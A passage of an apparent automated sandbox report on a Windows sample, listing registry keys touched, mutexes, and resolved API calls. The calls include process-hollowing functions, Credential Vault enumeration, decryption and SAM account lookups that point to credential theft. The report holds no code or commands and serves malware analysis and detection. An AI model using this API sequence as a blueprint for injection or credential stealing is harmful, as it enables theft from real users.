NT\CurrentVersion\Svchost\netsvcs\CoInitializeSecurityAppID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs\DeferredCoInitializeSecurityServices HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs\DefaultRpcStackSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs\SystemCritical HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\Parameters\ServiceDll HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\Parameters\ServiceManifest HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\Parameters\ServiceMain HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\NoResyncPerf HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\MOF Self-Install Directory HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ADAPDelay HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\LodCtrDelay HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\TimeToFullDredge HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\TimeToTerminateAdap HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\LastFullDredgeTimestamp HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\AECFFC7E HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\MaxSxSHashCount HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\FinalizerActivityBypass HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C49E32C6-BC8B-11D2-85D4-00105A1F8304}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\SessionEnabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\Level HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\AreaFlags HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\Session HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\LogFile HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\BufferSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MinimumBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MaximumBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MaximumFileSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\LogFileMode HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\FlushTimer HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\AgeLimit HKEY_LOCAL_MACHINE\SYSTEM\Setup\UpgradeInProgress HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Settings\ActiveWriterStateTimeout HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Diag\(Default) HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Settings\TornComponentsMax HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000100-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9555-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9557-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\InprocServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\ThreadingModel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\IdentifierLimit HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\QueryLimit HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\PathLimit HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbThrottlingEnabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighMaxLimitFactor HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbTaskMaxSleep HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold1 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold1Mult HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold2 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold2Mult HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold3 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold3Mult HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Unchecked Task Count HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Repository Directory HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Build HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Logging Directory HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Default Repository Driver HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueCoreFsrepVersion HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Repository Cache Spill Ratio HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\CheckPointValue HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SnapShotValue HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\CheckRepositoryOnNextStartup HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\NumWriteIdCheck HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Class Cache Size HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Class Cache Item Age (ms) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\NextAutoRecoverFile HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Enable Provider Subsystem HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{024D43BD-09FA-4CB3-A425-C9AFB00D8F9D}\CreationTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{024D43BD-09FA-4CB3-A425-C9AFB00D8F9D}\Provider HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{024D43BD-09FA-4CB3-A425-C9AFB00D8F9D}\Scope HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{024D43BD-09FA-4CB3-A425-C9AFB00D8F9D}\Locale HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{024D43BD-09FA-4CB3-A425-C9AFB00D8F9D}\User HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{024D43BD-09FA-4CB3-A425-C9AFB00D8F9D}\MarshaledProxy HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{024D43BD-09FA-4CB3-A425-C9AFB00D8F9D}\ProcessIdentifier HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1B619FBC-5204-4C91-8F2A-B6406B0F0278}\CreationTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1B619FBC-5204-4C91-8F2A-B6406B0F0278}\Provider HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1B619FBC-5204-4C91-8F2A-B6406B0F0278}\Scope HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1B619FBC-5204-4C91-8F2A-B6406B0F0278}\Locale HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1B619FBC-5204-4C91-8F2A-B6406B0F0278}\User HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1B619FBC-5204-4C91-8F2A-B6406B0F0278}\MarshaledProxy HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1B619FBC-5204-4C91-8F2A-B6406B0F0278}\ProcessIdentifier HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D1398C3F-1B66-4A30-916D-776E1DDE80A1}\CreationTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D1398C3F-1B66-4A30-916D-776E1DDE80A1}\Provider HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D1398C3F-1B66-4A30-916D-776E1DDE80A1}\Scope HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D1398C3F-1B66-4A30-916D-776E1DDE80A1}\Locale HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D1398C3F-1B66-4A30-916D-776E1DDE80A1}\User HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D1398C3F-1B66-4A30-916D-776E1DDE80A1}\MarshaledProxy HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D1398C3F-1B66-4A30-916D-776E1DDE80A1}\ProcessIdentifier HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{EFE6E846-7D3A-45F6-A5FA-A686F2785670}\CreationTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{EFE6E846-7D3A-45F6-A5FA-A686F2785670}\Provider HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{EFE6E846-7D3A-45F6-A5FA-A686F2785670}\Scope HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{EFE6E846-7D3A-45F6-A5FA-A686F2785670}\Locale HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{EFE6E846-7D3A-45F6-A5FA-A686F2785670}\User HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{EFE6E846-7D3A-45F6-A5FA-A686F2785670}\MarshaledProxy HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{EFE6E846-7D3A-45F6-A5FA-A686F2785670}\ProcessIdentifier HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnableEvents HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueEssToBeInitialized HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Low Threshold On Events (B) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\High Threshold On Events (B) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Wait On Events (ms) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Merger Query Arbitration Enabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SetupDate HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\FinalizerBatchSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ClientCallbackTimeout HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\FinalizerQueueThreshold HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Tasks HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Async Result Queue Size HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\cimv2 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\cimv2 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\ThreadingModel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\Synchronization HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\AppId HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\wmi HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\wmi HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D588B5-D081-11D0-99E0-00C04FC2F8EC}\InprocServer32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D588B5-D081-11D0-99E0-00C04FC2F8EC}\InprocServer32\ThreadingModel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D588B5-D081-11D0-99E0-00C04FC2F8EC}\InprocServer32\Synchronization HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D588B5-D081-11D0-99E0-00C04FC2F8EC}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D588B5-D081-11D0-99E0-00C04FC2F8EC}\AppId HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueEssNeedsLoading HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\Root HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\Root HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Sink Transmit Buffer Size HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\DefaultRpcStackSize HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CMF\Config\SYSTEM
Write Keys
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\Type HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\cval HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DiskDiagnostics\DFDCollectorInvokeTimes HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\AdaptiveSqm\ManifestInfo\Version HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\WSqmConsLastRunTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\WSqmConsLastEventTimeStamp HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\LastServiceStart HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\PreviousServiceShutdown HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ProcessID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ThrottleDrege HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\Parameters\ServiceDllUnloadOnStop HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Server HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\CreationTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\MarshaledProxy HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\ProcessIdentifier HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueEssNeedsLoading HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\List of event-active namespaces HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\ESS\//./root/CIMV2\SCM Event Provider HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\WDM\IDE\DiskVBOX_HARDDISK___________________________1.0_____\5&33d1638a&0&0.0.0_0-{05901221-D566-11d1-B2F0-00A0C9062910}
Delete Keys
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\LastServiceStart HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\WDM\WMIBinaryMofResource.HighDateTime=30016556,LowDateTime=1652017424,Name="C:\Windows\system32\advapi32.dll[MofResourceName]"
Mutexes
Global\CLR_CASOFF_MUTEX D448845E628773E4A9A809DA Global\SQMWindowsConsolidator Global\ADAP_WMI_ENTRY Global\RefreshRA_Mutex Global\RefreshRA_Mutex_Lib Global\RefreshRA_Mutex_Flag
Resolved APIs
advapi32.dll.RegOpenKeyExW advapi32.dll.RegQueryInfoKeyW advapi32.dll.RegEnumKeyExW advapi32.dll.RegEnumValueW advapi32.dll.RegCloseKey advapi32.dll.RegQueryValueExW kernel32.dll.FlsAlloc kernel32.dll.FlsFree kernel32.dll.FlsGetValue kernel32.dll.FlsSetValue kernel32.dll.InitializeCriticalSectionEx kernel32.dll.CreateEventExW kernel32.dll.CreateSemaphoreExW kernel32.dll.SetThreadStackGuarantee kernel32.dll.CreateThreadpoolTimer kernel32.dll.SetThreadpoolTimer kernel32.dll.WaitForThreadpoolTimerCallbacks kernel32.dll.CloseThreadpoolTimer kernel32.dll.CreateThreadpoolWait kernel32.dll.SetThreadpoolWait kernel32.dll.CloseThreadpoolWait kernel32.dll.FlushProcessWriteBuffers kernel32.dll.FreeLibraryWhenCallbackReturns kernel32.dll.GetCurrentProcessorNumber kernel32.dll.GetLogicalProcessorInformation kernel32.dll.CreateSymbolicLinkW kernel32.dll.EnumSystemLocalesEx kernel32.dll.CompareStringEx kernel32.dll.GetDateFormatEx kernel32.dll.GetLocaleInfoEx kernel32.dll.GetTimeFormatEx kernel32.dll.GetUserDefaultLocaleName kernel32.dll.IsValidLocaleName kernel32.dll.LCMapStringEx kernel32.dll.GetTickCount64 advapi32.dll.EventRegister mscoree.dll.#142 mscoreei.dll.RegisterShimImplCallback mscoreei.dll.OnShimDllMainCalled mscoreei.dll._CorExeMain shlwapi.dll.UrlIsW version.dll.GetFileVersionInfoSizeW version.dll.GetFileVersionInfoW version.dll.VerQueryValueW kernel32.dll.InitializeCriticalSectionAndSpinCount kernel32.dll.IsProcessorFeaturePresent msvcrt.dll._set_error_mode msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z kernel32.dll.FindActCtxSectionStringW kernel32.dll.GetSystemWindowsDirectoryW mscoree.dll.GetProcessExecutableHeap mscoreei.dll.GetProcessExecutableHeap mscorwks.dll._CorExeMain mscorwks.dll.GetCLRFunction advapi32.dll.RegisterTraceGuidsW advapi32.dll.UnregisterTraceGuids advapi32.dll.GetTraceLoggerHandle advapi32.dll.GetTraceEnableLevel advapi32.dll.GetTraceEnableFlags advapi32.dll.TraceEvent mscoree.dll.IEE mscoreei.dll.IEE mscorwks.dll.IEE mscoree.dll.GetStartupFlags mscoreei.dll.GetStartupFlags mscoree.dll.GetHostConfigurationFile mscoreei.dll.GetHostConfigurationFile mscoreei.dll.GetCORVersion mscoree.dll.GetCORSystemDirectory mscoreei.dll.GetCORSystemDirectory_RetAddr mscoreei.dll.CreateConfigStream ntdll.dll.RtlUnwind kernel32.dll.IsWow64Process advapi32.dll.AllocateAndInitializeSid advapi32.dll.OpenProcessToken advapi32.dll.GetTokenInformation advapi32.dll.InitializeAcl advapi32.dll.AddAccessAllowedAce advapi32.dll.FreeSid kernel32.dll.AddVectoredContinueHandler kernel32.dll.RemoveVectoredContinueHandler advapi32.dll.ConvertSidToStringSidW shell32.dll.SHGetFolderPathW kernel32.dll.GetWriteWatch kernel32.dll.ResetWriteWatch kernel32.dll.CreateMemoryResourceNotification kernel32.dll.QueryMemoryResourceNotification kernel32.dll.QueryActCtxW kernel32.dll.GetVersionExW kernel32.dll.GetFullPathNameW ole32.dll.CoInitializeEx cryptbase.dll.SystemFunction036 ole32.dll.CoGetContextToken advapi32.dll.CryptAcquireContextA advapi32.dll.CryptReleaseContext advapi32.dll.CryptCreateHash advapi32.dll.CryptDestroyHash advapi32.dll.CryptHashData advapi32.dll.CryptGetHashParam advapi32.dll.CryptImportKey advapi32.dll.CryptExportKey advapi32.dll.CryptGenKey advapi32.dll.CryptGetKeyParam advapi32.dll.CryptDestroyKey advapi32.dll.CryptVerifySignatureA advapi32.dll.CryptSignHashA advapi32.dll.CryptGetProvParam advapi32.dll.CryptGetUserKey advapi32.dll.CryptEnumProvidersA mscoree.dll.GetMetaDataInternalInterface mscoreei.dll.GetMetaDataInternalInterface mscorwks.dll.GetMetaDataInternalInterface mscorjit.dll.getJit kernel32.dll.GetUserDefaultUILanguage kernel32.dll.SetErrorMode kernel32.dll.GetFileAttributesExW mscoreei.dll.LoadLibraryShim culture.dll.ConvertLangIdToCultureName kernel32.dll.lstrlen kernel32.dll.lstrlenW mscoree.dll.ND_RI4 mscoreei.dll.ND_RI4 kernel32.dll.VirtualProtect kernel32.dll.GlobalMemoryStatusEx kernel32.dll.GetEnvironmentVariableW kernel32.dll.SwitchToThread kernel32.dll.CloseHandle kernel32.dll.GetCurrentProcessId advapi32.dll.LookupPrivilegeValueW kernel32.dll.GetCurrentProcess advapi32.dll.AdjustTokenPrivileges kernel32.dll.OpenProcess psapi.dll.EnumProcessModules psapi.dll.GetModuleInformation psapi.dll.GetModuleBaseNameW psapi.dll.GetModuleFileNameExW kernel32.dll.GetProcAddress kernel32.dll.DebugActiveProcess kernel32.dll.WaitForDebugEvent kernel32.dll.ContinueDebugEvent kernel32.dll.DeleteFileA advapi32.dll.SetKernelObjectSecurity advapi32.dll.GetKernelObjectSecurity ntdll.dll.NtSetInformationProcess ntdll.dll.NtProtectVirtualMemory kernel32.dll.VirtualAllocEx kernel32.dll.GetThreadContext kernel32.dll.Wow64GetThreadContext ntdll.dll.NtUnmapViewOfSection kernel32.dll.ResumeThread kernel32.dll.SetThreadContext kernel32.dll.Wow64SetThreadContext kernel32.dll.WriteProcessMemory kernel32.dll.ReadProcessMemory kernel32.dll.TerminateProcess kernel32.dll.CreateProcessW ole32.dll.CoUninitialize kernel32.dll.CreateActCtxW kernel32.dll.AddRefActCtx kernel32.dll.ReleaseActCtx kernel32.dll.ActivateActCtx kernel32.dll.DeactivateActCtx kernel32.dll.GetCurrentActCtx advapi32.dll.EventUnregister cryptsp.dll.CryptAcquireContextW cryptsp.dll.CryptCreateHash cryptsp.dll.CryptHashData cryptsp.dll.CryptGetHashParam cryptsp.dll.CryptDestroyHash cryptsp.dll.CryptReleaseContext vaultcli.dll.VaultEnumerateItems vaultcli.dll.VaultEnumerateVaults vaultcli.dll.VaultFree vaultcli.dll.VaultGetItem vaultcli.dll.VaultOpenVault vaultcli.dll.VaultCloseVault sechost.dll.LookupAccountSidLocalW netapi32.dll.NetUserGetInfo cryptsp.dll.CryptImportKey cryptsp.dll.CryptSetKeyParam cryptsp.dll.CryptDecrypt cryptsp.dll.CryptDestroyKey sechost.dll.LookupAccountNameLocalW advapi32.dll.LookupAccountSidW uxtheme.dll.ThemeInitApiHook user32.dll.IsProcessDPIAware dwmapi.dll.DwmIsCompositionEnabled rpcrt4.dll.UuidFromStringW radarrs.dll.WdiDiagnosticModuleMain radarrs.dll.WdiHandleInstance radarrs.dll.WdiGetDiagnosticModuleInterfaceVersion ole32.dll.CoInitializeSecurity ole32.dll.CoCreateInstance kernel32.dll.SortGetHandle kernel32.dll.SortCloseHandle fntcache.dll.ServiceMain fntcache.dll.SvchostPushServiceGlobals ntmarta.dll.GetMartaExtensionInterface wkscli.dll.NetGetJoinInformation netutils.dll.NetApiBufferFree userenv.dll.UnregisterGPNotification gpapi.dll.UnregisterGPNotificationInternal ole32.dll.CoDisconnectContext dfdts.dll.DfdGetDefaultPolicyAndSMART sechost.dll.OpenSCManagerW sechost.dll.OpenServiceW sechost.dll.QueryServiceStatus sechost.dll.CloseServiceHandle sspicli.dll.GetUserNameExW pcwum.dll.PerfDeleteInstance pcwum.dll.PerfStopProvider propsys.dll.PropVariantToVariant ole32.dll.CoDisconnectObject wbemcore.dll.Shutdown ole32.dll.CoReleaseMarshalData kernel32.dll.RegDeleteValueW oleaut32.dll.#9 kernel32.dll.GetThreadPreferredUILanguages kernel32.dll.SetThreadPreferredUILanguages kernel32.dll.LocaleNameToLCID kernel32.dll.LCIDToLocaleName kernel32.dll.GetSystemDefaultLocaleName fastprox.dll.DllGetClassObject fastprox.dll.DllCanUnloadNow kernel32.dll.RegOpenKeyExW psapi.dll.EnumProcesses wmisvc.dll.ServiceMain cryptsp.dll.CryptGenRandom rpcrtremote.dll.I_RpcExtInitializeExtensionPoint ole32.dll.CoGetClassObject ole32.dll.CoGetMarshalSizeMax ole32.dll.CoMarshalInterface ole32.dll.CoUnmarshalInterface ole32.dll.StringFromIID ole32.dll.CoGetPSClsid ole32.dll.CoTaskMemAlloc ole32.dll.CoTaskMemFree ole32.dll.DcomChannelSetHResult vssapi.dll.CreateWriter oleaut32.dll.#6 oleaut32.dll.#2 advapi32.dll.LookupAccountNameW samcli.dll.NetLocalGroupGetMembers samlib.dll.SamConnect rpcrt4.dll.NdrClientCall3 rpcrt4.dll.RpcStringBindingComposeW rpcrt4.dll.RpcBindingFromStringBindingW rpcrt4.dll.RpcStringFreeW rpcrt4.dll.RpcBindingFree samlib.dll.SamOpenDomain samlib.dll.SamLookupNamesInDomain samlib.dll.SamOpenAlias samlib.dll.SamFreeMemory samlib.dll.SamCloseHandle samlib.dll.SamGetMembersInAlias samlib.dll.SamEnumerateDomainsInSamServer samlib.dll.SamLookupDomainInSamServer ole32.dll.CoCreateGuid ole32.dll.StringFromCLSID oleaut32.dll.#4 oleaut32.dll.#7 propsys.dll.VariantToPropVariant wbemcore.dll.Reinitialize wbemsvc.dll.DllGetClassObject wbemsvc.dll.DllCanUnloadNow authz.dll.AuthzInitializeContextFromToken authz.dll.AuthzInitializeObjectAccessAuditEvent2 authz.dll.AuthzAccessCheck authz.dll.AuthzFreeAuditEvent authz.dll.AuthzFreeContext authz.dll.AuthzInitializeResourceManager authz.dll.AuthzFreeResourceManager rpcrt4.dll.RpcBindingCreateW rpcrt4.dll.RpcBindingBind rpcrt4.dll.I_RpcMapWin32Status advapi32.dll.EventWrite advapi32.dll.EventActivityIdControl advapi32.dll.EventWriteTransfer advapi32.dll.EventEnabled kernel32.dll.RegCloseKey kernel32.dll.RegSetValueExW kernel32.dll.RegQueryValueExW wmisvc.dll.IsImproperShutdownDetected wevtapi.dll.EvtRender wevtapi.dll.EvtNext wevtapi.dll.EvtClose wevtapi.dll.EvtQuery wevtapi.dll.EvtCreateRenderContext 